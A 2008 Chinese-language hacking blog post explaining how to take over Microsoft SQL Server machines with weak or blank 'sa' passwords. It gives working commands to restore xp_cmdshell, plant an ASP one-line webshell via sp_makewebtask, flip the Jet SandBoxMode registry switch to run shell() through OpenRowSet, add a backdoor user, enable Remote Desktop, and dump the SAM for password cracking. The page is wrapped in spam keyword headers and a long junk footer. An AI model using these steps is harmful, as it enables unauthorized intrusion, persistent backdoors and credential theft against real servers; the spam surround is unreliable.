青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

Ay's Blog@CNSSUESTC

關于1433弱口令的利用-- by __ay

????? 這篇文章是面對大部分人的,所以對某些水平的人來說難免會有許多廢話,你們可以跳過,呵呵~好了,開始吧……啊~我肚子餓了~呵呵

????? 首先講下什么是1433弱口令漏洞,所謂弱口令就是指很簡單的一些密碼隨便猜就能猜出來的,比如說密碼是123,123456,admin甚至用戶名密碼 相同等等之類的狀況,我們就能輕易獲得對方的密碼。呵呵,許多人都很懶,所以密碼都很簡單,包括我也是,呵呵……(而且還經常那123當臨時密碼)。在說 下什么是1433弱口令,1433所指的是1個服務端口,什么服務呢?那就是傳說中的MSSQL啦,試想MSSQL安裝之初的默認密碼是空,然而又存在許 多懶網管,那么我們只要拿個工具簡單的掃下在檢測下密碼……嘿嘿……可想而之掃到1433弱口令的幾率還是蠻大的~呵呵

??? 接下來我們說說拿到SA權限的1433弱口令我們能干什么,大家都知道XP_CMDSHELL這個擴展儲存吧,這個擴展儲存可以看做是MSSQL提供給管 理者執行CMD命令的一個功能模塊,通過這個我們可以執行CMD命令而更可喜的是SA權限的帳戶一般都是以SYSTEM權限啟動的,權限相當于計算機管理 員權限,那么我們相當于可以用CMD命令的形式控制你要入侵的計算機了,當然我們肯定不會滿足于用CMD控制機器,我們的目標是通過3389或者其他的軟 件來達到控制計算機的目的。下面我們來分類討論各種情況下的切入點,僅供參考……

以下假設你拿到了SA權限若口令的機器。有專門的SQL查詢分析器可以連接對方.大家有興趣可以去下一個來看看.

?

1.當3389終端開啟的時候,而目標機子也沒做類似IP這樣的過濾,那么我們就直接執行CMD命令加個用戶,然后用加的用戶登上去就OK了~呵呵

(需要無敵RP啊~~~)

2.那么如果CMD命令可以執行,但是沒開3389,我們先掃下目標IP,看他有沒有開80端口,有的話90%是有 WEB服務的,那么我們是SA權限直接丟個小馬上去,嘿嘿.........有了馬我們可以上傳東西啦~~傳個開3389的工具上去執行,機器重啟下就可 以登3389了.

?

以下是SA權限下備分小馬的語句;

exec sp_makewebtask '備分路徑',' select ''一句話木馬'' ';--

?

例子如下

http:\\xx.x.x.x.asp?id=1;exec sp_makewebtask 'd:\wwwroot\ay.asp',' select ''<%25eval (request('#'))25%>'' ';--

?

?

??????? 其實1433弱口令跟注入非常相似,比如你1433上有WEB服務你也可以用查詢語句把用戶名和密碼找出來進后臺傳馬.思路是非常多的,但是看你怎么使用了.

????? MSSQL的功能非常強大,所以幾乎沒有它辦不到的事(擴展儲存沒刪除情況下~而且SA權限沒被降為USERS用戶啟動).但是但是萬一人家把CMD給你 刪除了,恢復也恢復不了的時候又該怎么辦呢?如果我們沒有CMDSHELL,又沒開3389,那么SA權限看起來就象是雞肋~

?

????? 關于在SQL連接器上查看目錄的方式

?

exec xp_dirtree '(目錄名,比如c:\)',1,1

?????

????? 執行后就會返回目標機器指定目錄下的文件夾和文件,那么通過這個你就可以列目錄了

????? 這個擴展儲存的說明在注入語句集合里面有,這里就略過

?

?

?

?

?

exec xp_regread/exec xp_regwrite 注冊表操作的擴展儲存

?

????? 下面引用啊D注入語句里面的例子

?

寫注冊表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

?

讀注冊表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

?

?

???? 如果CMDSHELL用不了的時候,我們來試著恢復下CMD

?

??? exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

??? 然后執行CMD命令,如果還是不行的話,唉~~那沒辦法了,呵呵,一會講到,呵呵~~~繼續往下看吧~

?

???? 來,我們來提一下傳說中的沙盒模式提權,

?

?

不是分割線

--------------------------------------------------------------------------------------------------------------------------------

???? 首先我在<Jet引擎可以調用VBA的shell()函數>(http://support.microsoft.com/kb /q239104/)這份資料知道在accessl里可以直接進行sql查詢,具體的在Access中測試.測試的SQL語句如下:

SELECT shell('c:\windows\system32\cmd.exe /c net user ray 123 /ad');

?

查看計算機管理的本地用戶,馬上發現多出一個ray用戶,說明語句成功執行了.接下來寫一個VBS腳本任意連接一個mdb來測試這個SQL語句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)


運行后會出現"表達式中的'Shell'函數未 定義"的錯誤,<Jet引擎可以調用VBA的 shell()函數>提到WINDOWS在Jet引擎中設置了一個名為SandBoxMode的開關,它的注冊表位置在 HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,0為在任何所 有者中中都禁止起用安全設置,1為僅在允許的范圍之內,2則是必須是Access的模式下,3則是完全開啟安全設置.默認情況下為2,只能在Access 的模式下調用VBA的shell()函數,我們嘗試將此注冊表值改為0,結果成功的運行了VBS利用Jet引擎可以調用VBA的shell()函數執行了 系統命令.

通常一臺MSSQL服務器同時支持Access數據庫,所以只要有一個sa或者dbowner的連接,就滿足了修改注冊表的條件,因為MSSQL有一個名為xp_regwrite的擴展,它的作用是修改注冊表的值.語法如下


exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value


如果存在一個sa或者dbowner的連接的SQL注入點,就可以構造出如下注入語句


InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--


那我們將SandBoxMode開關的注冊表值修改為0就成功 了.接著連接到一個Access數據庫中,就可以執行系統命令,當然執行系統命令我們只需要一個Access數據庫相關Select的注入點或者直接用 ASP文件Select調用這個VBA的 shell()函數,但是實際上MSSQL有一個的OpenRowSet函數,它的作用是打開一個特殊的數據庫或者連接到另一個數據庫之中.當我們有一個 SA權限連接的時候,就可以做到打開Jet引擎連接到一個Access數據庫,同時我們搜索系統文件會發現windows系統目錄下本身就存在兩個 Access數據庫,位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,這樣一來我們又可以利用OpenRowSet函數構造出如下注入語句:
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');--


如果你覺得不大好懂的話,我可以給你做一個簡化的理解:
1,Access可以調用VBS的函數,以System權限執行任意命令
2,Access執行這個命令是有條件的,需要一個開關被打開
3,這個開關在注冊表里
4,SA是有權限寫注冊表的
5,用SA寫注冊表的權限打開那個開關
6,調用Access里的執行命令方法,以system權限執行任意命令

??????

?

------------------------------------------------------------------------------------------

不是分割線

?????

????? 看完了吧~辛苦了~呵呵,呵呵,直接把原文貼出來了,我好懶啊我~原理就是上面說的那個

????? CMD不是刪除了么?嘿嘿~我們用剛剛講的方法來執行,具體如下

?????

首先執行

?

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode','REG_DWORD',1

?

?


呵呵~把注冊表改了~

不放心的話我們來讀讀看~

?

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.\Engines','SandBoxMode'

?

如果返回的值是1的話證明命令成功了

?


那么我們就可以用SYSTEM函數來執行命令了 下面給出執行命令語句

?

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c query user >c:\windows\11.txt")');

?

紅色字體的是我執行的命令,>c:\windows \11.txt的意思是把回顯命令導入到windows的文件夾下的1.txt,一會要用到的.黑色字體是我們數據庫的路徑,特別需要注意的是如果是 windows2000 那么灰色部分就應該是c:\winnt\system32\ias\ias.mdb?

如果是windows2003的話就是c:\windows\system32\ias\ias.mdb

?

后邊也是一樣情況 win2003是windows目錄而2000是winnt目錄

?

?

?

執行命令的時候是不是心里面很沒底呢?而且有些命令比如NETSTAT之類的是需要查看回顯的,那么怎么才能得到回顯呢~~~嘿嘿~~無疑MSSQL肯定為我們提供了讀取文件內容的功能操作

那么我們就來看看怎么操作的吧~~呵呵

操作如下
select * from openrowset('microsoft.jet.oledb.4.0','text;database=c:\windows\','select * from 11.txt')

?

灰色部分是文件所在目錄,而紅色是文件名

?

比如我想讀D:\WWW\XXX\目錄下的A.ASP文件,那么語句如下

?

select * from openrowset('microsoft.jet.oledb.4.0','text;database=D:\WWW\XXX\','select * from A.ASP')

?

還記得我剛剛把命令回顯導出的步驟嗎?我們就用上面這個操作來讀取TXT內容就可以得到我們的CMD執行命令回顯了,很好玩吧~呵呵??

?

這就是我饒過CMDSHELL來執行命令的一點心得,呵呵? 我們接下來說說3389的問題

?

一些關于3389終端的信息:

?

????? 其實在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp下的PortNumber鍵值 和

????? HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp下的PortNumber鍵值

記錄著3389的端口號 如果想改連接端口號的話直接用xp_regwrite修改對應的鍵值就OK了~呵呵

?

????? 那么接下來說說最關鍵的問題,在注冊表下存在一個決定3389開啟與否的鍵值,鍵值位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server下的fDenyTSConnections

?

其值是0表示開啟 1表示關閉,我們直接用XP_REGWRITE把值修改就好了~~

?

?

語句如下

?

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0

?

你們不放心可以用XP_REGREAD確認

具體語句不寫了,大家現學現賣吧,呵呵~~

?

好了,最后說過我沒實踐過的思路,理論上可行吧,呵呵

?

當你的沙盒模式也不能用的時候那么,嘿嘿?? ^-^

我們起碼還是能從目標機器上拿點什么東西的嘛,比如說SAM啊~呵呵

?

首先用OPENROWSET這個函數把SAM的內容暴出來

然后復制內容,本地新建個SAM把復制的內容導進去,保存,相當與把目標機子的SAM給下下來,然后暴吧~~把管理員的密碼暴出來,接著用XP_REGWRITE把3389端口開了就好了

?

?

其實開3389的時候還會遇到很多情況,由于我沒實踐,所以沒什么好說的了,如果大家以后遇到什么這方面的問題可以拿來一起討論,嘿嘿

?

至于怎么破SAM,OPENROWSET的函數用法之類的就不說了~去百度一下吧~~

?

posted on 2008-12-07 16:15 __ay 閱讀(2515) 評論(0)  編輯 收藏 引用 所屬分類: Security

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            国产精品国内视频| 亚洲精品中文字幕女同| 亚洲国产精品免费| 狠狠爱www人成狠狠爱综合网| 欧美日本在线看| 欧美三级欧美一级| 国产精品久久一区二区三区| 国产麻豆精品在线观看| 一色屋精品亚洲香蕉网站| 亚洲激情六月丁香| 亚洲婷婷综合色高清在线| 欧美一级视频| 欧美国产一区二区三区激情无套| 亚洲人成小说网站色在线| 亚洲最黄网站| 羞羞答答国产精品www一本| 久久亚洲国产精品一区二区| 欧美日韩视频第一区| 国产在线观看一区| 99在线|亚洲一区二区| 欧美在线播放视频| 亚洲欧洲午夜| 久久国产一区二区| 欧美体内谢she精2性欧美| 狠狠色狠色综合曰曰| 亚洲一区二区免费看| 美女日韩在线中文字幕| 在线亚洲欧美专区二区| 免费久久99精品国产自| 国产精品一级二级三级| 99国产精品久久久久久久成人热| 久久精品中文字幕免费mv| 久久精品人人做人人综合| 久久亚洲视频| 欧美超级免费视 在线| 国产精品一区毛片| 日韩午夜电影在线观看| 久久国产成人| 一本久久综合亚洲鲁鲁五月天| 欧美一区二视频| 欧美午夜久久| 亚洲美女黄网| 牛牛国产精品| 欧美一级大片在线观看| 国产精品久久久久av免费| 亚洲精品视频在线| 欧美成年人视频| 久久久www| 国产一区二区三区日韩欧美| 亚洲在线播放电影| 亚洲狼人精品一区二区三区| 欧美a级片网站| 亚洲国产第一页| 女生裸体视频一区二区三区| 久久成人精品一区二区三区| 国产美女精品一区二区三区| 亚洲一区二区视频在线| 亚洲国产日韩一区二区| 能在线观看的日韩av| 亚洲国内精品在线| 亚洲国产精品小视频| 欧美华人在线视频| 在线亚洲欧美专区二区| 一本久道久久综合婷婷鲸鱼 | 一本色道久久综合精品竹菊| 欧美寡妇偷汉性猛交| 亚洲精品无人区| 亚洲欧洲综合另类在线| 欧美日韩久久精品| 亚洲欧美视频一区二区三区| 亚洲综合大片69999| 国产欧美日韩一区二区三区在线观看| 亚洲欧美激情四射在线日| 亚洲一区精品视频| 国精品一区二区| 欧美大片一区| 欧美日韩亚洲另类| 欧美在线免费观看视频| 久久久久久夜| 一卡二卡3卡四卡高清精品视频 | 久久国产黑丝| 亚洲第一区在线观看| 亚洲精品国产精品乱码不99按摩 | 99国产精品国产精品毛片| 99一区二区| 韩国精品主播一区二区在线观看| 欧美成人自拍| 亚洲欧美欧美一区二区三区| 亚洲国产免费看| 麻豆精品精品国产自在97香蕉| 亚洲国产日韩在线| 日韩视频中午一区| 国产一二三精品| 最新国产拍偷乱拍精品| 国产日本欧美一区二区三区| 亚洲成色www久久网站| 国产精品人人爽人人做我的可爱| 欧美成人a视频| 国产精品亚洲不卡a| 亚洲国产老妈| 国语自产在线不卡| 亚洲先锋成人| 99精品视频免费观看| 久久精品官网| 亚洲欧美日韩一区二区| 蜜臀av性久久久久蜜臀aⅴ| 欧美一级大片在线观看| 欧美精品一区二区三区很污很色的| 久久本道综合色狠狠五月| 欧美人成在线视频| 男人的天堂成人在线| 国产日韩欧美精品在线| 99re6这里只有精品视频在线观看 99re6这里只有精品 | 久久久xxx| 欧美日韩亚洲综合一区| 亚洲电影免费观看高清| 国色天香一区二区| 亚洲欧美在线高清| 午夜精品亚洲一区二区三区嫩草| 欧美成人精品在线观看| 狂野欧美一区| 狠狠久久亚洲欧美| 欧美一区二区三区久久精品茉莉花 | 亚洲欧美春色| 亚洲欧美另类国产| 欧美视频精品一区| 日韩亚洲综合在线| 中日韩美女免费视频网址在线观看| 久久亚洲风情| 欧美高清视频一区二区| 亚洲高清久久久| 美女图片一区二区| 欧美韩日一区二区| 亚洲乱码国产乱码精品精可以看 | 久久夜色精品国产欧美乱极品| 欧美一区二区视频97| 国产精品久久久久久影院8一贰佰| 亚洲理论在线观看| 一区二区三区四区蜜桃| 欧美日韩亚洲一区二区三区在线 | 猫咪成人在线观看| 欧美成人免费网站| 亚洲人成啪啪网站| 欧美日本中文| 欧美一区二区三区日韩视频| 91久久久久久久久| 欧美成人高清视频| 最新国产の精品合集bt伙计| 亚洲精品一区二区三区婷婷月| 欧美成人在线网站| 一区二区三区视频观看| 欧美在线地址| 亚洲夫妻自拍| 欧美日韩国产精品自在自线| 在线亚洲一区观看| 久久久久久亚洲精品中文字幕| 伊人影院久久| 欧美日韩理论| 欧美在线视频一区二区| 亚洲高清在线| 性久久久久久| 亚洲国产网站| 国产精品老牛| 久久亚洲综合网| aⅴ色国产欧美| 久久综合久色欧美综合狠狠 | 亚洲国产精品久久久久秋霞不卡| 欧美激情一区二区三区高清视频| 中文在线一区| 免费看的黄色欧美网站| 中日韩男男gay无套| 在线成人av| 国产精品久久国产三级国电话系列| 欧美制服第一页| 夜夜嗨av一区二区三区中文字幕| 久久激情中文| 在线中文字幕一区| 亚洲第一二三四五区| 国产精品免费电影| 欧美剧在线观看| 久久人人97超碰国产公开结果| 在线性视频日韩欧美| 亚洲电影免费观看高清完整版在线观看| 亚洲小说区图片区| 亚洲精品欧美在线| 国内久久精品视频| 国产精品成人播放| 欧美国产日韩一区二区三区| 欧美在线观看天堂一区二区三区| 亚洲美女在线一区| 欧美成人亚洲| 久久午夜色播影院免费高清| 亚洲女人小视频在线观看| 亚洲最新在线视频| 亚洲欧洲日韩综合二区| 伊人久久婷婷色综合98网| 国产午夜亚洲精品羞羞网站| 国产精品日韩久久久久| 国产精品hd| 国产精品高潮呻吟久久av黑人|